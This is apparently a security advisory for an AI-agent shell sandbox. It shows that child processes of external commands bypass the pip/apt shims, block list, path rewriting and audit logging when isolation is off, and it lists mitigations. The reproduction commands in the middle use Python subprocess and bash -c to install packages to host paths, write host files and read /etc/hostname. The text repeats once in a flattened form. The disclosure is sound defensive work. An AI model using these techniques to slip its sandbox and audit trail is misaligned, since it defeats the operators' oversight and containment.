Summary
The pip shim, apt shim, call handler (block list, path rewriting, audit logging), and all other mvdan.cc/sh ExecHandlerFunc intercepts apply only to commands invoked directly by the shell interpreter. Any process spawned as a child of an external command (a "grandchild" process) runs completely outside this chain — with full access to the real host filesystem, real package managers, and real system state.
Affected code
Confirmed reproduction
Pip shim bypass (root and locked profiles, isolation=none)
agentic-bash run --isolation none \
--cmd 'python3 -c "
import subprocess
r = subprocess.run(
[\"pip3\", \"install\", \"--target=/tmp/escaped_pip\", \"requests\"],
text=True, capture_output=True
)
print(r.returncode, r.stderr[:80])
"'
# Output: 0 WARNING: Running pip as the 'root' user...
# On the host:
ls /tmp/escaped_pip/
# requests/ requests-2.x.dist-info/ ← installed to REAL host path
General subprocess escape (root profile, isolation=none)
agentic-bash run --isolation none \
--cmd 'bash -c "echo ESCAPED > /tmp/bash_subprocess_escape.txt"'
# On the host:
ls /tmp/bash_subprocess_escape.txt # ← exists on real host filesystem
Subprocess escape via python3 (locked profile, isolation=none)
agentic-bash run --isolation none \
--cmd 'python3 -c "import subprocess; r=subprocess.run([\"bash\",\"-c\",\"id; cat /etc/hostname\"], text=True, capture_output=True); print(r.stdout)"'
# Output: uid=1000(agent) gid=1000(agent) groups=1000(agent)\nagentic-bash-vm
Impact
- Pip shim bypass: install Python packages to arbitrary host directories, poisoning the host Python environment
- General escape: any external command can launch child processes with full host access, bypassing audit logging, block lists, and path rewriting
- The entire intercept layer provides zero security when language runtimes (Python, Node.js, bash) are available
Fix / Mitigations
- Document clearly:
IsolationNone provides only shell-level illusions — zero process containment. Require IsolationNamespace or higher for any security guarantee.
- Enforce isolation for shims: When pip/apt shims are active, reject
IsolationNone with an error.
- Language runtime hardening (defense-in-depth): Inject
sitecustomize.py to block subprocess, os.system, multiprocessing in Python runtime when running inside sandbox.
- Document the threat model: The README should explicitly state what
IsolationNone does and does not protect against.
Severity
High — defeats pip shim, apt shim, block list, audit logging, and path rewriting for any code that spawns subprocesses (which includes most real-world scripts).
Summary
The pip shim, apt shim, call handler (block list, path rewriting, audit logging), and all other
mvdan.cc/shExecHandlerFunc intercepts apply only to commands invoked directly by the shell interpreter. Any process spawned as a child of an external command (a "grandchild" process) runs completely outside this chain — with full access to the real host filesystem, real package managers, and real system state.Affected code
packages/shim.go:35-45— Shim dispatch is only at themvdan.cc/shExecHandlerFunc levelexecutor/intercept/callhook.go:38-85— Same limitation: intercept applies to direct invocations onlyIsolationNoneprovides zero OS-level process containmentConfirmed reproduction
Pip shim bypass (root and locked profiles, isolation=none)
General subprocess escape (root profile, isolation=none)
Subprocess escape via python3 (locked profile, isolation=none)
Impact
Fix / Mitigations
IsolationNoneprovides only shell-level illusions — zero process containment. RequireIsolationNamespaceor higher for any security guarantee.IsolationNonewith an error.sitecustomize.pyto blocksubprocess,os.system,multiprocessingin Python runtime when running inside sandbox.IsolationNonedoes and does not protect against.Severity
High — defeats pip shim, apt shim, block list, audit logging, and path rewriting for any code that spawns subprocesses (which includes most real-world scripts).